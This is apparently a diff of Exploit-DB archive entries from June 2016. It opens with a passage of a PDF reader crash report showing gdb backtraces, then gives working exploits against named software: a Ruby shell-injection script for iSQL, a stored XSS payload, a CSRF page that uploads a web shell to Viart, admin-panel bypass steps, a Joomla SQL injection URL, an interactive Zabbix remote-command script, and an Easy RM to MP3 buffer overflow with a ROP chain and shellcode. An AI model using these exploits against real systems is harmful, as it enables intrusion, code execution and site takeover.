+rip            0xaab96c 0xaab96c <CFX_BaseSegmentedArray::IterateIndex(int, int&, void**, int (*)(void*, void*), void*) const+94>
+eflags         0x10202  [ IF RF ]
+cs             0x33     51
+ss             0x2b     43
+ds             0x0      0
+es             0x0      0
+fs             0x0      0
+gs             0x0      0
+--- cut ---
+
+Attached are three proof of concept PDF files.
+
+There is another crash likely related to this issue:
+
+--- cut ---
+Program received signal SIGSEGV, Segmentation fault.
+0x0000000000ab0f94 in _CMapLookupCallback(void*, void*) ()
+(gdb) where
+#0  0x0000000000ab0f94 in _CMapLookupCallback(void*, void*) ()
+#1  0x0000000000aab8e4 in CFX_BaseSegmentedArray::IterateSegment(unsigned char const*, int, int (*)(void*, void*), void*) const ()
+#2  0x0000000000aab9dc in CFX_BaseSegmentedArray::Iterate(int (*)(void*, void*), void*) const ()
+#3  0x0000000000ab1a99 in CFX_CMapByteStringToPtr::Lookup(CFX_ByteStringC const&, void*&) const ()
+#4  0x00000000007db5df in CPDF_Dictionary::KeyExist(CFX_ByteStringC const&) const ()
+#5  0x000000000070e6a6 in CBMTreeCtrl::GotoBookmark(CPDF_Bookmark, CPDF_Bookmark) ()
+#6  0x000000000070e6e3 in CBMTreeCtrl::GotoBookmark(CPDF_Bookmark, CPDF_Bookmark) ()
+#7  0x000000000070f986 in CBMTreeCtrl::on_ItemExpanded(QTreeWidgetItem*) ()
+#8  0x00007ffff63682a6 in QMetaObject::activate(QObject*, int, int, void**) ()
+   from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5
+#9  0x00007ffff7722612 in QTreeWidget::itemExpanded(QTreeWidgetItem*) ()
+   from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
+#10 0x00007ffff63682a6 in QMetaObject::activate(QObject*, int, int, void**) ()
+   from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5
+#11 0x00007ffff76ecc92 in QTreeView::expanded(QModelIndex const&) ()
+   from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
+#12 0x00007ffff76f8903 in QTreeView::expand(QModelIndex const&) ()
+   from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
+#13 0x00007ffff7724e44 in QTreeWidget::expandItem(QTreeWidgetItem const*) ()
+   from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
+#14 0x000000000070a0cb in CBMTreeView::ReBuildTree_Proc(CFX_BookMarkPanelToolHandler*, CPDF_Document*, CPDF_Bookmark, QTreeWidgetItem*, int, int) ()
+#15 0x000000000070a4c7 in CBMTreeView::ReBuildTree_Proc(CFX_BookMarkPanelToolHandler*, CPDF_Document*, CPDF_Bookmark, QTreeWidgetItem*, int, int) ()
+#16 0x000000000070beb6 in CBMTreeView::ReBuildTree(int) ()
+#17 0x000000000051eaff in CChildFrame::GetPanelMgrEx (this=0x196cf90)
+    at ../../Readerlite/ReaderLite/src/childframe.cpp:91
+x#18 0x00000000005000c1 in CReader_DocViewEx::InitViewData (this=0x191dce0)
+    at ../../Readerlite/ReaderLite/src/frd_docviewex.cpp:61
+#19 0x000000000048e691 in CPDF_OwnerFileTypeHandler::OpenContinueNormal (this=0x1468c50, pdoc=0x19194b0, 
+    filePath=...) at ../../Readerlite/ReaderLite/src/pdfeventhandler.cpp:99
+/#20 0x000000000048f754 in CPDF_OwnerFileTypeHandler::DoOpen (this=0x1468c50, csFilterName=..., 
+    wsPathName=...) at ../../Readerlite/ReaderLite/src/pdfeventhandler.cpp:216
+#21 0x000000000045d038 in CReader_AppEx::OwnerFileTypeHandlerDoOpen (this=0x144a920, csFDFFile=...)
+    at ../../Readerlite/ReaderLite/src/frd_appex.cpp:941
+1#22 0x000000000043caac in CMainWindow::OpenFile (this=0x1468760, fileName=...)
+    at ../../Readerlite/ReaderLite/src/mainwindow.cpp:434
+#23 0x0000000000439da9 in main (argc=2, argv=0x7fffffffe288) at ../../Readerlite/ReaderLite/src/main.cpp:301
+(gdb) x/10i $rip
+=> 0xab0f94 <_Z19_CMapLookupCallbackPvS_+2>:    cmp    %edi,(%rsi)
+   0xab0f96 <_Z19_CMapLookupCallbackPvS_+4>:    jne    0xab0fa1 <_Z19_CMapLookupCallbackPvS_+15>
+   0xab0f98 <_Z19_CMapLookupCallbackPvS_+6>:    xor    %eax,%eax
+   0xab0f9a <_Z19_CMapLookupCallbackPvS_+8>:    cmpb   $0xfe,0x4(%rsi)
+   0xab0f9e <_Z19_CMapLookupCallbackPvS_+12>:   setne  %al
+   0xab0fa1 <_Z19_CMapLookupCallbackPvS_+15>:   xor    $0x1,%eax
+   0xab0fa4 <_Z19_CMapLookupCallbackPvS_+18>:   retq   
+   0xab0fa5 <_CompareDWord>:    mov    (%rdi),%eax
+   0xab0fa7 <_CompareDWord+2>:  sub    (%rsi),%eax
+   0xab0fa9 <_CompareDWord+4>:  retq   
+(gdb) info reg $rsi
+rsi            0x71     113
+--- cut ---
+
+Attached are three further files which reproduce the crash (note that MALLOC_CHECK_=3 might be necessary).
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39944.zip
+

platforms/linux/local/39938.rb

@@ -0,0 +1,90 @@
+#!/bin/ruby
+# Exploit Title: iSQL(RL) 1.0 - Shell Command Injection
+# Date: 2016-06-13
+# Exploit Author: HaHwul
+# Exploit Author Blog: www.hahwul.com
+# Vendor Homepage: https://github.com/roselone/iSQL
+# Software Link: https://github.com/roselone/iSQL/archive/master.zip
+# Version: 1.0
+# Tested on: Debian [wheezy]
+# CVE : none
+
+
+=begin
+### Vulnerability Point
+ :: [isql_main.c 455 line] popen(cmd,"r"); code is vulnerable
+ :: don't filtering special characters in str value
+446 char *get_MD5(char *str){
+447         FILE *stream;
+448         char *buf=malloc(sizeof(char)*33);
+449         char cmd[100];
+450         memset(buf,'\0',sizeof(buf));
+451         memset(cmd,'\0',sizeof(cmd));
+452         strcpy(cmd,"echo "); //5
+453         strcpy((char *)cmd+5,str);
+454         strcpy((char *)cmd+5+strlen(str)," | md5sum");
+455         stream=popen(cmd,"r");
+456         fread(buf,sizeof(char),32,stream);
+457 //      printf("%s\n",buf);
+458         return buf;
+459 }
+
+### Vulnerability Triger
+614          while (USER_NUM==-1){
+615                 printf(">username:");
+616                 scanf("%s",username);
+617                 printf(">password:");
+618                 scanf("%s",passwd);
+619                 md5=get_MD5(passwd);
+
+### Vulnerability Run
+>username:asdf;   
+>password:asdf;top;echo 1
+
+ (~) #> ps -aux | grep top
+root     13279  0.0  0.0   4472   860 pts/1    S+   13:33   0:00 sh -c echo asdf;top;echo | md5sum
+root     13280  0.3  0.0  26304  3200 pts/1    S+   13:33   0:00 top
+
+=end 
+
+### Attack command
+#> (sleep 5; echo -en 'aasdf\n';sleep 1;echo -en 'asdf;nc;echo 1';sleep 10) | ./isql
+
+### Ruby Code
+puts "SQL 1.0 - Shell Command Injection"
+puts "by hahwul"
+if(ARGV.size != 1)
+  puts "Usage: ruby iSQL_command_injection.rb [COMMAND]"
+  puts " need ./isql in same directory"
+  exit()
+else 
+  puts "CMD :: "+ARGV[0]
+  puts "Run Injection.."
+  system("(sleep 5; echo -en 'aasdf\n';sleep 1;echo -en 'asdf;#{ARGV[0]};echo 1';sleep 10) | ./isql")
+end
+
+### Sample Output
+=begin
+#> ruby test.rb nc
+# Exploit Title: iSQL 1.0 Shell Command Injection
+by hahwul
+CMD :: nc
+Run Injection..
+
+*************** welcome to ISQL ****************
+* version 1.0                                  *
+* Designed by RL                               *
+* Copyright (c) 2011, RL. All rights reserved  *
+************************************************
+
+>username:>password:verify failure , try again !
+This is nc from the netcat-openbsd package. An alternative nc is available
+in the netcat-traditional package.
+usage: nc [-46bCDdhjklnrStUuvZz] [-I length] [-i interval] [-O length]
+	  [-P proxy_username] [-p source_port] [-q seconds] [-s source]
+	  [-T toskeyword] [-V rtable] [-w timeout] [-X proxy_protocol]
+	  [-x proxy_address[:port]] [destination] [port]
+>username:>password:verify failure , try again !
+^Ctest.rb:10:in `system': Interrupt
+	from test.rb:10:in `<main>'
+=end

platforms/php/webapps/39931.txt

@@ -0,0 +1,49 @@
+# Exploit Title: FRticket - Ticket System - Stored XSS
+# Google Dork: [if applicable]
+# Date: 11.06.2016
+# Exploit Author: Hamit ABİŞ
+# Vendor Homepage: http://codecanyon.net/item/frticket-ticket-system/16539836
+# Version: v1
+
+#########################################################################################################
+
+About
+
+
+Get the world’s most popular customer support ticket system. FRticket is basically a management of enquiries between customers , agents and admins
+
+
+Features:
+
+
+- Admin Panel Dashboard
+
+- Email Templates
+
+- Agent Assignment
+
+- Status Management
+
+- Priority Management
+
+- Categories Management
+
+- And More Coming Soon…
+
+
+#########################################################################################################
+
+
+##########################################################################################################
+Proof of Concept - Stored Ticket Title
+
+POST /ticket/public/ticket HTTP/1.1
+Host: server
+User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.04
+Connection: keep-alive
+_token=3XSACg1vDJQgzFCkVGk7nqE0HMOPlsuo7sbj5Z2y&subject=<svg onload=prompt(1)>&priority=2&category=2&description=somecomments
+
+##########################################################################################################
+
+
+Twitter: https://twitter.com/sar1nz

platforms/php/webapps/39932.html

@@ -0,0 +1,57 @@
+<!--
+# Exploit Title : Viart Shopping Cart 5.0 CSRF Shell Upload Vulnerability
+# Date : 2016/06/12
+# Google Dork : Script-Kiddie ;)
+# Exploit Author : Ali Ghanbari
+# Vendor Homepage : http://www.viart.com/
+# Software Link  : http://www.viart.com/php_shopping_cart_free_evaluation_download.html
+# Version : 5.0
+
+
+#POC
+-->
+
+<html>
+  <body onload="submitRequest();">
+    <script>
+      function submitRequest()
+      {
+        var xhr = new XMLHttpRequest();
+        xhr.open("POST", "http://localhost/admin/admin_fm_upload_files.php", true);
+        xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
+        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
+        xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------256672629917035");
+        xhr.withCredentials = "true";
+        var body = "-----------------------------256672629917035\r\n" +
+          "Content-Disposition: form-data; name=\"dir_root\"\r\n" +
+          "\r\n" +
+          "../images\r\n" +
+          "-----------------------------256672629917035\r\n" +
+          "Content-Disposition: form-data; name=\"newfile_0\"; filename=\"[shell.php]\"\r\n" +
+          "Content-Type: application/x-php\r\n" +
+          "\r\n" +
+          "\r\n" +
+          "-----------------------------256672629917035--\r\n";
+        var aBody = new Uint8Array(body.length);
+        for (var i = 0; i < aBody.length; i++)
+          aBody[i] = body.charCodeAt(i);
+        xhr.send(new Blob([aBody]));
+      }
+    </script>
+  </body>
+</html>
+
+<!--
+#Desc:
+
+upload exploit code in your host and send link to admin when admin click on link, you can
+access to your shell from below path :
+
+http://localhost/images/[your shell]
+
+####################################
+ 
+[+]Exploit by: Ali Ghanbari
+
+[+]My Telegram :@Exploiter007  
+-->

platforms/php/webapps/39934.txt

@@ -0,0 +1,42 @@
+<!--
+# Exploit Title:  Dream Gallery 2.0 - Admin panel Authentication bypass
+# Date: 13th June 2016
+# Exploit Author: Ali BawazeEer
+# Vendor Homepage: http://phpstaff.com.br/
+# Version: 2.0
+
+--!>
+
+
+=======================================================================================================
+
+Dream Gallery 2.0 Admin panel Authentication bypass 
+
+Description : An Attackers are able to completely compromise the web application built upon
+Dream Gallery as they can gain access to the admin panel and 
+manage the website as an admin without prior authentication!
+
+
+Step 1: Create a rule in No-Redirect Add-on: ^http://example.com/path/admin/login.php
+Step 2: Access http://example.com/path/admin/index.php
+
+
+Risk : Unauthenticated attackers are able to gain full access to the administrator panel
+and thus have total control over the web application, including content change,add admin user .. etc
+
+=======================================================================================================
+potential fix 
+
+
+<?php 
+session_start(); 
+if (!isset($_SESSION["auth"])) {         
+exit(header('Location: admin/login.php')); 
+} 
+
+?>
+
+
+[+] Exploit by: Ali BawazeEer
+[+] Twitter:@AlibawazeEer
+[+] Linkedin : https://www.linkedin.com/in/AliBawazeEer

platforms/php/webapps/39935.txt

@@ -0,0 +1,42 @@
+<!--
+# Exploit Title:  Grid Gallery 1.0 - Admin panel Authentication bypass
+# Date: 13th June 2016
+# Exploit Author: Ali BawazeEer
+# Vendor Homepage: http://phpstaff.com.br/
+# Version: 2.0
+
+--!>
+
+
+=======================================================================================================
+
+Grid Gallery 1.0 Admin panel Authentication bypass 
+
+Description : An Attackers are able to completely compromise the web application built upon
+Grid Gallery as they can gain access to the admin panel and 
+manage the website as an admin without prior authentication!
+
+
+Step 1: Create a rule in No-Redirect Add-on: ^http://example.com/path/admin/login.php
+Step 2: Access http://example.com/path/admin/index.php
+
+
+Risk : Unauthenticated attackers are able to gain full access to the administrator panel
+and thus have total control over the web application, including content change,add admin user .. etc
+
+=======================================================================================================
+potential fix 
+
+
+<?php 
+session_start(); 
+if (!isset($_SESSION["auth"])) {         
+exit(header('Location: admin/login.php')); 
+} 
+
+?>
+
+
+[+] Exploit by: Ali BawazeEer
+[+] Twitter:@AlibawazeEer
+[+] Linkedin : https://www.linkedin.com/in/AliBawazeEer

platforms/php/webapps/39936.txt

@@ -0,0 +1,25 @@
+######################
+# Exploit Title : Joomla com_payplans - SQL Injection
+# Exploit Author : Persian Hack Team
+# Vendor Homepage : http://extensions.joomla.org/extension/payplans
+# Category: [ Webapps ]
+# Tested on: [ Win ]
+# Version: 3.3.6
+# Date: 2016/06/08
+######################
+#
+# PoC:
+
+# group_id Parameter Vulnerable To SQL
+
+# Demo :
+
+# http://server/index.php?option=com_payplans&group_id=4%27
+
+# Youtube : https://www.youtube.com/watch?v=Y5mpM0IBlUk
+
+######################
+# Discovered by : Mojtaba MobhaM 
+# Greetz : Muhmmad Emad & T3NZOG4N & FireKernel & Milad Hacking & JOK3R And All Persian Hack Team Members
+# Homepage : persian-team.ir
+######################

platforms/php/webapps/39937.py

@@ -0,0 +1,75 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+
+# Exploit Title: Zabbix RCE with API JSON-RPC
+# Date: 06-06-2016
+# Exploit Author: Alexander Gurin
+# Vendor Homepage: http://www.zabbix.com
+# Software Link: http://www.zabbix.com/download.php
+# Version: 2.2 - 3.0.3
+# Tested on: Linux (Debian, CentOS)
+# CVE : N/A
+
+import requests
+import json
+import readline
+
+ZABIX_ROOT = 'http://192.168.66.2'	### Zabbix IP-address
+url = ZABIX_ROOT + '/api_jsonrpc.php'	### Don't edit
+
+login = 'Admin'		### Zabbix login
+password = 'zabbix'	### Zabbix password
+hostid = '10084'	### Zabbix hostid
+
+### auth
+payload = {
+   	"jsonrpc" : "2.0",
+    "method" : "user.login",
+    "params": {
+    	'user': ""+login+"",
+    	'password': ""+password+"",
+    },
+   	"auth" : None,
+    "id" : 0,
+}
+headers = {
+    'content-type': 'application/json',
+}
+
+auth  = requests.post(url, data=json.dumps(payload), headers=(headers))
+auth = auth.json()
+
+while True:
+	cmd = raw_input('\033[41m[zabbix_cmd]>>: \033[0m ')
+	if cmd == "" : print "Result of last command:"
+	if cmd == "quit" : break
+
+### update
+	payload = {
+		"jsonrpc": "2.0",
+		"method": "script.update",
+		"params": {
+		    "scriptid": "1",
+		    "command": ""+cmd+""
+		},
+		"auth" : auth['result'],
+		"id" : 0,
+	}
+
+	cmd_upd = requests.post(url, data=json.dumps(payload), headers=(headers))
+
+### execute
+	payload = {
+		"jsonrpc": "2.0",
+		"method": "script.execute",
+		"params": {
+		    "scriptid": "1",
+		    "hostid": ""+hostid+""
+		},
+		"auth" : auth['result'],
+		"id" : 0,
+	}
+
+	cmd_exe = requests.post(url, data=json.dumps(payload), headers=(headers))
+	cmd_exe = cmd_exe.json()
+	print cmd_exe["result"]["value"]

platforms/windows/local/39933.py

@@ -0,0 +1,192 @@
+# Exploit Title: Easy RM to MP3 Converter 2.7.3.700 (.m3u) File BoF Exploit with Universal DEP+ASLR bypass
+# Date: 2016-06-12
+# Exploit Author: Csaba Fitzl
+# Vendor Homepage: N/A
+# Software Link: https://www.exploit-db.com/apps/707414955696c57b71c7f160c720bed5-EasyRMtoMP3Converter.exe
+# Version: 2.7.3.700
+# Tested on: Windows 7 x64
+# CVE : CVE-2009-1330
+
+import struct
+
+def create_rop_chain():
+
+	# rop chain generated with mona.py - www.corelan.be
+	# added missing parts, and some optimisation by Csaba Fitzl
+	rop_gadgets = [
+
+	  #mov 1000 to EDX - Csaba
+	  0x41414141,  # Filler (compensate)
+	  0x41414141,  # Filler (compensate)
+	  0x41414141,  # Filler (compensate)
+	  0x10025a1c,  # XOR EDX,EDX # RETN 
+	  0x1002bc3d,  # MOV EAX,411 # RETN
+	  0x1002dc4c,  # ADD EAX,100 # POP EBP # RETN 
+	  0x41414141,  # Filler (compensate)
+	  0x1002dc4c,  # ADD EAX,100 # POP EBP # RETN 
+	  0x41414141,  # Filler (compensate)
+	  0x1002dc4c,  # ADD EAX,100 # POP EBP # RETN 
+	  0x41414141,  # Filler (compensate)
+	  0x1002dc4c,  # ADD EAX,100 # POP EBP # RETN 
+	  0x41414141,  # Filler (compensate)
+	  0x1002dc4c,  # ADD EAX,100 # POP EBP # RETN 
+	  0x41414141,  # Filler (compensate)
+	  0x1002dc4c,  # ADD EAX,100 # POP EBP # RETN 
+	  0x41414141,  # Filler (compensate)
+	  0x1002dc4c,  # ADD EAX,100 # POP EBP # RETN 
+	  0x41414141,  # Filler (compensate)
+	  0x1002dc4c,  # ADD EAX,100 # POP EBP # RETN 
+	  0x41414141,  # Filler (compensate)
+	  0x1002dc4c,  # ADD EAX,100 # POP EBP # RETN 
+	  0x41414141,  # Filler (compensate)
+	  0x1002dc4c,  # ADD EAX,100 # POP EBP # RETN 
+	  0x41414141,  # Filler (compensate)
+	  0x1002dc4c,  # ADD EAX,100 # POP EBP # RETN 
+	  0x41414141,  # Filler (compensate)
+	  0x1002dc24,  # ADD EAX,80 # POP EBP # RETN
+	  0x41414141,  # Filler (compensate)
+	  0x1002dc41,  # ADD EAX,40 # POP EBP # RETN
+	  0x41414141,  # Filler (compensate)
+	  0x1001d2ac,  # ADD EAX,4 # RETN
+	  0x1001d2ac,  # ADD EAX,4 # RETN
+	  0x1001d2ac,  # ADD EAX,4 # RETN
+	  0x1001d2ac,  # ADD EAX,4 # RETN
+	  0x1001d2ac,  # ADD EAX,4 # RETN
+	  0x1001d2ac,  # ADD EAX,4 # RETN
+	  0x1001d2ac,  # ADD EAX,4 # RETN
+	  0x1001d2ac,  # ADD EAX,4 # RETN
+	  0x1001d2ac,  # ADD EAX,4 # RETN
+	  0x1001d2ac,  # ADD EAX,4 # RETN
+	  0x1001d2ac,  # ADD EAX,4 # RETN
+	  0x10023327,  # INC EAX # RETN
+	  0x10023327,  # INC EAX # RETN
+	  0x10023327,  # INC EAX # RETN
+	  # AT this point EAX = 0x1000
+	  0x1001a788,  # PUSH EAX # POP ESI # POP EBP # MOV EAX,1 # POP EBX # POP ECX # RETN [MSRMfilter03.dll] 
+	  0x41414141,  # Filler (compensate)
+	  0x41414141,  # Filler (compensate)
+	  0x41414141,  # Filler (compensate)
+	  0x1001bf0d, #(RVA : 0x0001bf0d) : # ADC EDX,ESI
+	  0x41414141,  # Filler (compensate)
+	  
+	
+	  0x10026d56,  # POP EAX # RETN [MSRMfilter03.dll] 
+	  0x10032078,  # ptr to &VirtualAlloc() [IAT MSRMfilter03.dll]
+	  0x1002e0c8,  # MOV EAX,DWORD PTR DS:[EAX] # RETN [MSRMfilter03.dll]
+	   
+	  0x1001a788,  # PUSH EAX # POP ESI # POP EBP # MOV EAX,1 # POP EBX # POP ECX # RETN [MSRMfilter03.dll] 
+	  0x41414141,  # Filler (compensate)
+	  0x41414141,  # Filler (compensate)
+	  0x41414141,  # Filler (compensate)
+	  0x10027c5a,  # POP EBP # RETN [MSRMfilter03.dll] 
+	  0x1001b058,  # & push esp # ret  [MSRMfilter03.dll]
+	  0x1002b93e,  # POP EAX # RETN [MSRMfilter03.dll] 
+	  0xfffffffb,  # put delta into eax (-> put 0x00000001 into ebx)
+	  0x1001d2ac,  # ADD EAX,4 # RETN
+	  0x10023327,  # INC EAX # RETN
+	  0x10023327,  # INC EAX # RETN
+	  0x1001bdee,  # PUSH EAX # MOV EAX,1 # POP EBX # ADD ESP,8 # RETN [MSRMfilter03.dll] 
+	  0x41414141,  # Filler (compensate)
+	  0x41414141,  # Filler (compensate)
+
+	  0x10029f74,  # POP ECX # RETN [MSRMfilter03.dll] 
+	  0xffffffff,  #  
+	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
+	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
+	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
+	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
+	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
+	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
+	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
+	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
+	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
+	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
+	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
+	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
+	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
+	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
+	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
+	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
+	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
+	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
+	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
+	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
+	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
+	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
+	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
+	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
+	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
+	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
+	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
+	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
+	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
+	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
+	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
+	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
+	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
+	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
+	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
+	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
+	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
+	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
+	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
+	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
+	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
+	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
+	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
+	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
+	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
+	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
+	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
+	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
+	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
+	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
+	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
+	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
+	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
+	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
+	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
+	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
+	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
+	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
+	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
+	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
+	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
+	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
+	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
+	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
+	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
+	  0x1002bc6a,  # POP EDI # RETN [MSRMfilter03.dll] 
+	  0x1001c121,  # RETN (ROP NOP) [MSRMfilter03.dll]
+	  0x10026f2b,  # POP EAX # RETN [MSRMfilter03.dll] 
+	  0x10024004, #address to xor, it will point to the DLL's data section which is writeable. Also will work as NOP
+	  0x1002bc07  # PUSHAD # XOR EAX,11005 # ADD BYTE PTR DS:[EAX],AL 
+
+	]
+	return ''.join(struct.pack('<I', _) for _ in rop_gadgets)
+
+buffersize = 26090
+
+junk = "A" * buffersize
+
+eip = '\x85\x22\x01\x10' # {pivot 8 / 0x08} :  # ADD ESP,8 # RETN
+
+rop = create_rop_chain()
+
+calc = (
+"\x31\xD2\x52\x68\x63\x61\x6C\x63\x89\xE6\x52\x56\x64"
+"\x8B\x72\x30\x8B\x76\x0C\x8B\x76\x0C\xAD\x8B\x30\x8B"
+"\x7E\x18\x8B\x5F\x3C\x8B\x5C\x1F\x78\x8B\x74\x1F\x20"
+"\x01\xFE\x8B\x4C\x1F\x24\x01\xF9\x42\xAD\x81\x3C\x07"
+"\x57\x69\x6E\x45\x75\xF5\x0F\xB7\x54\x51\xFE\x8B\x74"
+"\x1F\x1C\x01\xFE\x03\x3C\x96\xFF\xD7")
+ 
+
+shell = "\x90"*0x10 + calc
+
+exploit = junk + eip + rop + shell + 'C' * (1000-len(rop)-len(shell))
+
+filename = "list.m3u"
+textfile = open(filename , 'w')
+textfile.write(exploit)
+textfile.close()